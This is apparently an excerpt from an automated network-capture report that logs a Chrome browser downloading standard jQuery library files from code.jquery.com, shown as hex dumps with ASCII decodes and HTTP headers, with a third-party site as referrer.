                                                                                                                                          2024-11-28 10:32:14 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77
                                                                                                                                          Data Ascii: /*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
                                                                                                                                          2024-11-28 10:32:15 UTC16384INData Raw: 3d 3d 3d 6d 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 74 26 26 28 73 26 26 28 6c 3d 6d 5b 75 5d 7c 7c 28 6d 5b 75 5d 3d 7b 7d 29 2c 6b 3d 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 2c 6b 5b 61 5d 3d 5b 77 2c 74 5d 29 2c 6d 3d 3d 3d 62 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 74 2d 3d 65 2c 74 3d 3d 3d 64 7c 7c 74 25 64 3d 3d 3d 30 26 26 74 2f 64 3e 3d 30 7d 7d 7d 2c 50 53 45 55 44 4f 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 65 3d 64 2e 70 73 65 75 64 6f 73 5b 61 5d 7c 7c 64 2e 73 65 74 46 69 6c 74 65 72 73 5b 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 67 61 2e 65 72 72 6f 72 28 22 75 6e 73 75 70 70 6f 72 74 65 64 20 70 73 65 75 64 6f 3a 20 22 2b 61 29 3b 72 65 74
                                                                                                                                          Data Ascii: ===m.nodeType)&&++t&&(s&&(l=m[u]||(m[u]={}),k=l[m.uniqueID]||(l[m.uniqueID]={}),k[a]=[w,t]),m===b))break;return t-=e,t===d||t%d===0&&t/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]||d.setFilters[a.toLowerCase()]||ga.error("unsupported pseudo: "+a);ret
                                                                                                                                          2024-11-28 10:32:15 UTC16384INData Raw: 64 3d 31 2c 55 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 62 7c 7c 28 62 3d 7b 7d 2c 54 28 61 29 26 26 28 61 2e 6e 6f 64 65 54 79 70 65 3f 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 62 3a 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 74 68 69 73 2e 65 78 70 61 6e 64 6f 2c 7b 76 61 6c 75 65 3a 62 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 29 29 2c 62 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 2c 65 3d 74 68 69 73 2e 63 61 63 68 65 28 61 29 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 29 65 5b 72 2e 63 61 6d 65 6c 43 61 73 65
                                                                                                                                          Data Ascii: d=1,U.prototype={cache:function(a){var b=a[this.expando];return b||(b={},T(a)&&(a.nodeType?a[this.expando]=b:Object.defineProperty(a,this.expando,{value:b,configurable:!0}))),b},set:function(a,b,c){var d,e=this.cache(a);if("string"==typeof b)e[r.camelCase
                                                                                                                                          2024-11-28 10:32:15 UTC16384INData Raw: 65 26 26 39 21 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 28 74 68 69 73 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 61 29 7d 29 7d 2c 6e 75 6c 6c 2c 61 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7d 2c 61 70 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 31 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 29 7b 76 61 72 20 62 3d 44 61 28 74 68 69 73 2c 61 29 3b 62 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 7d 29 7d 2c 70 72 65 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28
                                                                                                                                          Data Ascii: e&&9!==this.nodeType||(this.textContent=a)})},null,a,arguments.length)},append:function(){return Ia(this,arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=Da(this,a);b.appendChild(a)}})},prepend:function(){return Ia(
                                                                                                                                          2024-11-28 10:32:15 UTC16384INData Raw: 73 2e 73 65 6c 65 63 74 65 64 3d 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 6e 75 6c 6c 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 62 26 26 28 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 29 7d 7d 29 2c 72 2e 65 61 63 68 28 5b 22 74 61 62 49 6e 64 65 78 22 2c 22 72 65 61 64 4f 6e 6c 79 22 2c 22 6d 61 78 4c 65 6e 67 74 68 22 2c 22 63 65 6c 6c 53 70 61 63
                                                                                                                                          Data Ascii: s.selected={get:function(a){var b=a.parentNode;return b&&b.parentNode&&b.parentNode.selectedIndex,null},set:function(a){var b=a.parentNode;b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex)}}),r.each(["tabIndex","readOnly","maxLength","cellSpac
                                                                                                                                          2024-11-28 10:32:15 UTC4789INData Raw: 3d 62 2e 6a 73 6f 6e 70 21 3d 3d 21 31 26 26 28 52 62 2e 74 65 73 74 28 62 2e 75 72 6c 29 3f 22 75 72 6c 22 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 2e 64 61 74 61 26 26 30 3d 3d 3d 28 62 2e 63 6f 6e 74 65 6e 74 54 79 70 65 7c 7c 22 22 29 2e 69 6e 64 65 78 4f 66 28 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 29 26 26 52 62 2e 74 65 73 74 28 62 2e 64 61 74 61 29 26 26 22 64 61 74 61 22 29 3b 69 66 28 68 7c 7c 22 6a 73 6f 6e 70 22 3d 3d 3d 62 2e 64 61 74 61 54 79 70 65 73 5b 30 5d 29 72 65 74 75 72 6e 20 65 3d 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 3d 72 2e 69 73 46 75 6e 63 74 69 6f 6e 28 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 29 3f 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62
                                                                                                                                          Data Ascii: =b.jsonp!==!1&&(Rb.test(b.url)?"url":"string"==typeof b.data&&0===(b.contentType||"").indexOf("application/x-www-form-urlencoded")&&Rb.test(b.data)&&"data");if(h||"jsonp"===b.dataTypes[0])return e=b.jsonpCallback=r.isFunction(b.jsonpCallback)?b.jsonpCallb


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          4192.168.2.449746151.101.66.1374432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:14 UTC573OUTGET /jquery-3.3.1.js HTTP/1.1
                                                                                                                                          Host: code.jquery.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          Origin: https://igacorp.conohawing.com
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://igacorp.conohawing.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:14 UTC613INHTTP/1.1 200 OK
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 271751
                                                                                                                                          Server: nginx
                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                          ETag: "28feccc0-42587"
                                                                                                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Age: 3122360
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:14 GMT
                                                                                                                                          X-Served-By: cache-lga21980-LGA, cache-ewr-kewr1740054-EWR
                                                                                                                                          X-Cache: HIT, HIT
                                                                                                                                          X-Cache-Hits: 334, 0
                                                                                                                                          X-Timer: S1732789935.651248,VS0,VE1
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          2024-11-28 10:32:14 UTC1378INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 79 20 76 33 2e 33 2e 31 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 49 6e 63 6c 75 64 65 73 20 53 69 7a 7a 6c 65 2e 6a 73 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 73 69 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 44 61 74 65 3a 20 32 30 31 38 2d 30 31 2d 32 30 54 31 37
                                                                                                                                          Data Ascii: /*! * jQuery JavaScript Library v3.3.1 * https://jquery.com/ * * Includes Sizzle.js * https://sizzlejs.com/ * * Copyright JS Foundation and other contributors * Released under the MIT license * https://jquery.org/license * * Date: 2018-01-20T17
                                                                                                                                          2024-11-28 10:32:14 UTC1378INData Raw: 2e 20 42 75 74 20 61 73 20 6f 66 20 6a 51 75 65 72 79 20 33 2e 30 20 28 32 30 31 36 29 2c 20 73 74 72 69 63 74 20 6d 6f 64 65 20 73 68 6f 75 6c 64 20 62 65 20 63 6f 6d 6d 6f 6e 0a 2f 2f 20 65 6e 6f 75 67 68 20 74 68 61 74 20 61 6c 6c 20 73 75 63 68 20 61 74 74 65 6d 70 74 73 20 61 72 65 20 67 75 61 72 64 65 64 20 69 6e 20 61 20 74 72 79 20 62 6c 6f 63 6b 2e 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 76 61 72 20 61 72 72 20 3d 20 5b 5d 3b 0a 0a 76 61 72 20 64 6f 63 75 6d 65 6e 74 20 3d 20 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 0a 0a 76 61 72 20 67 65 74 50 72 6f 74 6f 20 3d 20 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 0a 0a 76 61 72 20 73 6c 69 63 65 20 3d 20 61 72 72 2e 73 6c 69 63 65 3b 0a 0a 76 61 72 20 63 6f 6e 63
                                                                                                                                          Data Ascii: . But as of jQuery 3.0 (2016), strict mode should be common// enough that all such attempts are guarded in a try block."use strict";var arr = [];var document = window.document;var getProto = Object.getPrototypeOf;var slice = arr.slice;var conc
                                                                                                                                          2024-11-28 10:32:14 UTC1378INData Raw: 63 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 20 73 63 72 69 70 74 20 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 20 73 63 72 69 70 74 20 29 3b 0a 09 7d 0a 0a 0a 66 75 6e 63 74 69 6f 6e 20 74 6f 54 79 70 65 28 20 6f 62 6a 20 29 20 7b 0a 09 69 66 20 28 20 6f 62 6a 20 3d 3d 20 6e 75 6c 6c 20 29 20 7b 0a 09 09 72 65 74 75 72 6e 20 6f 62 6a 20 2b 20 22 22 3b 0a 09 7d 0a 0a 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 41 6e 64 72 6f 69 64 20 3c 3d 32 2e 33 20 6f 6e 6c 79 20 28 66 75 6e 63 74 69 6f 6e 69 73 68 20 52 65 67 45 78 70 29 0a 09 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 6f 62 6a 20 3d 3d 3d 20 22 6f 62 6a 65 63 74 22 20 7c 7c 20 74 79 70 65 6f 66 20 6f 62 6a 20 3d 3d 3d 20 22 66 75 6e 63 74 69 6f 6e 22 20 3f 0a 09
                                                                                                                                          Data Ascii: c.head.appendChild( script ).parentNode.removeChild( script );}function toType( obj ) {if ( obj == null ) {return obj + "";}// Support: Android <=2.3 only (functionish RegExp)return typeof obj === "object" || typeof obj === "function" ?
                                                                                                                                          2024-11-28 10:32:14 UTC1378INData Raw: 7b 0a 09 09 09 72 65 74 75 72 6e 20 73 6c 69 63 65 2e 63 61 6c 6c 28 20 74 68 69 73 20 29 3b 0a 09 09 7d 0a 0a 09 09 2f 2f 20 52 65 74 75 72 6e 20 6a 75 73 74 20 74 68 65 20 6f 6e 65 20 65 6c 65 6d 65 6e 74 20 66 72 6f 6d 20 74 68 65 20 73 65 74 0a 09 09 72 65 74 75 72 6e 20 6e 75 6d 20 3c 20 30 20 3f 20 74 68 69 73 5b 20 6e 75 6d 20 2b 20 74 68 69 73 2e 6c 65 6e 67 74 68 20 5d 20 3a 20 74 68 69 73 5b 20 6e 75 6d 20 5d 3b 0a 09 7d 2c 0a 0a 09 2f 2f 20 54 61 6b 65 20 61 6e 20 61 72 72 61 79 20 6f 66 20 65 6c 65 6d 65 6e 74 73 20 61 6e 64 20 70 75 73 68 20 69 74 20 6f 6e 74 6f 20 74 68 65 20 73 74 61 63 6b 0a 09 2f 2f 20 28 72 65 74 75 72 6e 69 6e 67 20 74 68 65 20 6e 65 77 20 6d 61 74 63 68 65 64 20 65 6c 65 6d 65 6e 74 20 73 65 74 29 0a 09 70 75 73 68 53
                                                                                                                                          Data Ascii: {return slice.call( this );}// Return just the one element from the setreturn num < 0 ? this[ num + this.length ] : this[ num ];},// Take an array of elements and push it onto the stack// (returning the new matched element set)pushS
                                                                                                                                          2024-11-28 10:32:14 UTC1378INData Raw: 65 72 79 2e 66 6e 2e 65 78 74 65 6e 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 76 61 72 20 6f 70 74 69 6f 6e 73 2c 20 6e 61 6d 65 2c 20 73 72 63 2c 20 63 6f 70 79 2c 20 63 6f 70 79 49 73 41 72 72 61 79 2c 20 63 6c 6f 6e 65 2c 0a 09 09 74 61 72 67 65 74 20 3d 20 61 72 67 75 6d 65 6e 74 73 5b 20 30 20 5d 20 7c 7c 20 7b 7d 2c 0a 09 09 69 20 3d 20 31 2c 0a 09 09 6c 65 6e 67 74 68 20 3d 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 0a 09 09 64 65 65 70 20 3d 20 66 61 6c 73 65 3b 0a 0a 09 2f 2f 20 48 61 6e 64 6c 65 20 61 20 64 65 65 70 20 63 6f 70 79 20 73 69 74 75 61 74 69 6f 6e 0a 09 69 66 20 28 20 74 79 70 65 6f 66 20 74 61 72 67 65 74 20 3d 3d 3d 20 22 62 6f 6f 6c 65 61 6e 22 20 29 20 7b 0a 09 09 64 65 65 70 20 3d 20 74 61 72 67 65 74 3b
                                                                                                                                          Data Ascii: ery.fn.extend = function() {var options, name, src, copy, copyIsArray, clone,target = arguments[ 0 ] || {},i = 1,length = arguments.length,deep = false;// Handle a deep copy situationif ( typeof target === "boolean" ) {deep = target;
                                                                                                                                          2024-11-28 10:32:14 UTC1378INData Raw: 65 2c 20 63 6f 70 79 20 29 3b 0a 0a 09 09 09 09 2f 2f 20 44 6f 6e 27 74 20 62 72 69 6e 67 20 69 6e 20 75 6e 64 65 66 69 6e 65 64 20 76 61 6c 75 65 73 0a 09 09 09 09 7d 20 65 6c 73 65 20 69 66 20 28 20 63 6f 70 79 20 21 3d 3d 20 75 6e 64 65 66 69 6e 65 64 20 29 20 7b 0a 09 09 09 09 09 74 61 72 67 65 74 5b 20 6e 61 6d 65 20 5d 20 3d 20 63 6f 70 79 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 7d 0a 09 7d 0a 0a 09 2f 2f 20 52 65 74 75 72 6e 20 74 68 65 20 6d 6f 64 69 66 69 65 64 20 6f 62 6a 65 63 74 0a 09 72 65 74 75 72 6e 20 74 61 72 67 65 74 3b 0a 7d 3b 0a 0a 6a 51 75 65 72 79 2e 65 78 74 65 6e 64 28 20 7b 0a 0a 09 2f 2f 20 55 6e 69 71 75 65 20 66 6f 72 20 65 61 63 68 20 63 6f 70 79 20 6f 66 20 6a 51 75 65 72 79 20 6f 6e 20 74 68 65 20 70 61 67 65 0a 09 65
                                                                                                                                          Data Ascii: e, copy );// Don't bring in undefined values} else if ( copy !== undefined ) {target[ name ] = copy;}}}}// Return the modified objectreturn target;};jQuery.extend( {// Unique for each copy of jQuery on the pagee
                                                                                                                                          2024-11-28 10:32:14 UTC1378INData Raw: 09 09 44 4f 4d 45 76 61 6c 28 20 63 6f 64 65 20 29 3b 0a 09 7d 2c 0a 0a 09 65 61 63 68 3a 20 66 75 6e 63 74 69 6f 6e 28 20 6f 62 6a 2c 20 63 61 6c 6c 62 61 63 6b 20 29 20 7b 0a 09 09 76 61 72 20 6c 65 6e 67 74 68 2c 20 69 20 3d 20 30 3b 0a 0a 09 09 69 66 20 28 20 69 73 41 72 72 61 79 4c 69 6b 65 28 20 6f 62 6a 20 29 20 29 20 7b 0a 09 09 09 6c 65 6e 67 74 68 20 3d 20 6f 62 6a 2e 6c 65 6e 67 74 68 3b 0a 09 09 09 66 6f 72 20 28 20 3b 20 69 20 3c 20 6c 65 6e 67 74 68 3b 20 69 2b 2b 20 29 20 7b 0a 09 09 09 09 69 66 20 28 20 63 61 6c 6c 62 61 63 6b 2e 63 61 6c 6c 28 20 6f 62 6a 5b 20 69 20 5d 2c 20 69 2c 20 6f 62 6a 5b 20 69 20 5d 20 29 20 3d 3d 3d 20 66 61 6c 73 65 20 29 20 7b 0a 09 09 09 09 09 62 72 65 61 6b 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 7d 20
                                                                                                                                          Data Ascii: DOMEval( code );},each: function( obj, callback ) {var length, i = 0;if ( isArrayLike( obj ) ) {length = obj.length;for ( ; i < length; i++ ) {if ( callback.call( obj[ i ], i, obj[ i ] ) === false ) {break;}}}
                                                                                                                                          2024-11-28 10:32:14 UTC1378INData Raw: 62 61 63 6b 45 78 70 65 63 74 20 3d 20 21 69 6e 76 65 72 74 3b 0a 0a 09 09 2f 2f 20 47 6f 20 74 68 72 6f 75 67 68 20 74 68 65 20 61 72 72 61 79 2c 20 6f 6e 6c 79 20 73 61 76 69 6e 67 20 74 68 65 20 69 74 65 6d 73 0a 09 09 2f 2f 20 74 68 61 74 20 70 61 73 73 20 74 68 65 20 76 61 6c 69 64 61 74 6f 72 20 66 75 6e 63 74 69 6f 6e 0a 09 09 66 6f 72 20 28 20 3b 20 69 20 3c 20 6c 65 6e 67 74 68 3b 20 69 2b 2b 20 29 20 7b 0a 09 09 09 63 61 6c 6c 62 61 63 6b 49 6e 76 65 72 73 65 20 3d 20 21 63 61 6c 6c 62 61 63 6b 28 20 65 6c 65 6d 73 5b 20 69 20 5d 2c 20 69 20 29 3b 0a 09 09 09 69 66 20 28 20 63 61 6c 6c 62 61 63 6b 49 6e 76 65 72 73 65 20 21 3d 3d 20 63 61 6c 6c 62 61 63 6b 45 78 70 65 63 74 20 29 20 7b 0a 09 09 09 09 6d 61 74 63 68 65 73 2e 70 75 73 68 28 20 65
                                                                                                                                          Data Ascii: backExpect = !invert;// Go through the array, only saving the items// that pass the validator functionfor ( ; i < length; i++ ) {callbackInverse = !callback( elems[ i ], i );if ( callbackInverse !== callbackExpect ) {matches.push( e
                                                                                                                                          2024-11-28 10:32:14 UTC1378INData Raw: 2c 20 6e 61 6d 65 20 29 20 7b 0a 09 63 6c 61 73 73 32 74 79 70 65 5b 20 22 5b 6f 62 6a 65 63 74 20 22 20 2b 20 6e 61 6d 65 20 2b 20 22 5d 22 20 5d 20 3d 20 6e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 0a 7d 20 29 3b 0a 0a 66 75 6e 63 74 69 6f 6e 20 69 73 41 72 72 61 79 4c 69 6b 65 28 20 6f 62 6a 20 29 20 7b 0a 0a 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 72 65 61 6c 20 69 4f 53 20 38 2e 32 20 6f 6e 6c 79 20 28 6e 6f 74 20 72 65 70 72 6f 64 75 63 69 62 6c 65 20 69 6e 20 73 69 6d 75 6c 61 74 6f 72 29 0a 09 2f 2f 20 60 69 6e 60 20 63 68 65 63 6b 20 75 73 65 64 20 74 6f 20 70 72 65 76 65 6e 74 20 4a 49 54 20 65 72 72 6f 72 20 28 67 68 2d 32 31 34 35 29 0a 09 2f 2f 20 68 61 73 4f 77 6e 20 69 73 6e 27 74 20 75 73 65 64 20 68 65 72 65 20 64 75 65 20 74
                                                                                                                                          Data Ascii: , name ) {class2type[ "[object " + name + "]" ] = name.toLowerCase();} );function isArrayLike( obj ) {// Support: real iOS 8.2 only (not reproducible in simulator)// `in` check used to prevent JIT error (gh-2145)// hasOwn isn't used here due t
                                                                                                                                          2024-11-28 10:32:14 UTC1378INData Raw: 6e 73 74 61 6e 63 65 20 6d 65 74 68 6f 64 73 0a 09 68 61 73 4f 77 6e 20 3d 20 28 7b 7d 29 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 0a 09 61 72 72 20 3d 20 5b 5d 2c 0a 09 70 6f 70 20 3d 20 61 72 72 2e 70 6f 70 2c 0a 09 70 75 73 68 5f 6e 61 74 69 76 65 20 3d 20 61 72 72 2e 70 75 73 68 2c 0a 09 70 75 73 68 20 3d 20 61 72 72 2e 70 75 73 68 2c 0a 09 73 6c 69 63 65 20 3d 20 61 72 72 2e 73 6c 69 63 65 2c 0a 09 2f 2f 20 55 73 65 20 61 20 73 74 72 69 70 70 65 64 2d 64 6f 77 6e 20 69 6e 64 65 78 4f 66 20 61 73 20 69 74 27 73 20 66 61 73 74 65 72 20 74 68 61 6e 20 6e 61 74 69 76 65 0a 09 2f 2f 20 68 74 74 70 73 3a 2f 2f 6a 73 70 65 72 66 2e 63 6f 6d 2f 74 68 6f 72 2d 69 6e 64 65 78 6f 66 2d 76 73 2d 66 6f 72 2f 35 0a 09 69 6e 64 65 78 4f 66 20 3d 20 66 75 6e
                                                                                                                                          Data Ascii: nstance methodshasOwn = ({}).hasOwnProperty,arr = [],pop = arr.pop,push_native = arr.push,push = arr.push,slice = arr.slice,// Use a stripped-down indexOf as it's faster than native// https://jsperf.com/thor-indexof-vs-for/5indexOf = fun


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          5192.168.2.449749151.101.66.1374432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:15 UTC582OUTGET /jquery-3.2.1.slim.min.js HTTP/1.1
                                                                                                                                          Host: code.jquery.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          Origin: https://igacorp.conohawing.com
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://igacorp.conohawing.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:15 UTC612INHTTP/1.1 200 OK
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 69597
                                                                                                                                          Server: nginx
                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                          ETag: "28feccc0-10fdd"
                                                                                                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Age: 3117881
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:15 GMT
                                                                                                                                          X-Served-By: cache-lga21984-LGA, cache-ewr-kewr1740054-EWR
                                                                                                                                          X-Cache: HIT, HIT
                                                                                                                                          X-Cache-Hits: 507, 0
                                                                                                                                          X-Timer: S1732789935.390893,VS0,VE1
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          2024-11-28 10:32:15 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 32 2e 31 20 2d 61 6a 61 78 2c 2d 61 6a 61 78 2f 6a 73 6f 6e 70 2c 2d 61 6a 61 78 2f 6c 6f 61 64 2c 2d 61 6a 61 78 2f 70 61 72 73 65 58 4d 4c 2c 2d 61 6a 61 78 2f 73 63 72 69 70 74 2c 2d 61 6a 61 78 2f 76 61 72 2f 6c 6f 63 61 74 69 6f 6e 2c 2d 61 6a 61 78 2f 76 61 72 2f 6e 6f 6e 63 65 2c 2d 61 6a 61 78 2f 76 61 72 2f 72 71 75 65 72 79 2c 2d 61 6a 61 78 2f 78 68 72 2c 2d 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 2f 5f 65 76 61 6c 55 72 6c 2c 2d 65 76 65 6e 74 2f 61 6a 61 78 2c 2d 65 66 66 65 63 74 73 2c 2d 65 66 66 65 63 74 73 2f 54 77 65 65 6e 2c 2d 65 66 66 65 63 74 73 2f 61 6e 69 6d 61 74 65 64 53 65 6c 65 63 74 6f 72 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e
